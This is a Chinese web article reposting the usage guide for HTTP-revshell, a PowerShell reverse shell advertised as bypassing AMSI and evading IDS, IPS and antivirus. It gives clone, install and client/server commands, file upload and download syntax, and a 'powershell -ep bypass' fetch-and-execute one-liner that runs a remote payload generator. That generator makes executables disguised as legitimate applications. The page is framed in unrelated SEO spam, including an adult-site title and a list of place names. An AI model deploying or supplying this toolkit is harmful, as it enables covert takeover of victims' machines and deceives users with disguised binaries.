中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

HTTP-revshell是什么意思

發布時間:2021-12-27 17:41:12 來源:億速云 閱讀:178 作者:小新 欄目:網絡管理

這篇文章將為大家詳細講解有關HTTP-revshell是什么意思,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。

HTTP-revshell

HTTP-revshell是一個能夠繞過AMSI的PowerShell代理感知型反向Shell,這款工具轉為紅隊研究人員以及滲透測試人員設計,能夠通過HTTP/S協議來給研究人員提供一個反向Shell鏈接。HTTP-revshell使用了一種隱蔽的數據信道,可以通過Web請求來獲取目標設備的控制權,從而繞過類似IDS、IPS和AV之類的安全解決方案。

功能介紹

  • SSL

  • 代理感知

  • 上傳功能

  • 下載功能

  • 錯誤控制

  • AMSI繞過

  • 服務器端多會話支持

  • PowerShell函數自動補全

工具安裝

廣大研究人員可以使用下列命令將該項目源碼克隆至本地,并完成依賴組件的自動化安裝:

git clone https://github.com/3v4Si0N/HTTP-revshell.git

cd HTTP-revshell/

pip3 install -r requirements.txt

數據提取功能使用

上傳:

upload /src/path/file C:\dest\path\file

下載:

download C:\src\path\file /dst/path/file

查看server.py幫助-服務器端使用

usage: server.py [-h] [--ssl] [--autocomplete] host port

 

Process some integers.

 

positional arguments:

  host            Listen Host

  port            Listen Port

 

optional arguments:

  -h, --help      show this help message and exit

  --ssl           Send traffic over ssl

  --autocomplete  Autocomplete powershell functions

查看WebRev.ps1幫助-客戶端使用

Import-Module .\Invoke-WebRev.ps1

Invoke-WebRev -ip IP -port PORT [-ssl]

工具使用-server-multisession.py(服務器端多會話支持)

服務器端支持同時與客戶端建立多個鏈接,下面給出的菜單中包含三哥基礎命令,即sessions、interact和exit:

- sessions --> 顯示當前活動會話

     - interact --> 與一個會話進行交互,比如說:interact <session_id>

     - exit --> 關閉應用程序

如需修改會話,可以按下CTRL+D來退出當前會話,此時不會關閉原有會話。

Revshell-Generator.ps1-Payload自動生成器

這個腳本可以幫助我們創建一個帶有Payload的可執行文件,這個文件是我們使用HTTP-revshell所必須的。工具提供了六個預定義的模板和一個支持自定義的模板。工具生成的Payload會偽裝成合法應用程序的圖標、產品信息和版權信息等等。除此之外,它們都會在與服務器建立連接之前打開原始的應用程序,并偽裝成合法應用程序來執行。

Payload生成器使用:

powershell -ep bypass "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

工具使用樣例

HTTP-revshell是什么意思

HTTP-revshell是什么意思HTTP-revshell是什么意思

關于“HTTP-revshell是什么意思”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,使各位可以學到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

荥经县| 万州区| 行唐县| 收藏| 中西区| 手游| 阿瓦提县| 治县。| 伊金霍洛旗| 林芝县| 隆回县| 清河县| 石阡县| 衡南县| 闽清县| 海南省| 韩城市| 鹿泉市| 宣城市| 大渡口区| 安塞县| 山阴县| 新民市| 泰兴市| 九江市| 昌图县| 丰原市| 丁青县| 儋州市| 南漳县| 达尔| 开封市| 肃南| 和龙市| 漠河县| 曲周县| 湘乡市| 盈江县| 金乡县| 昭苏县| 新建县|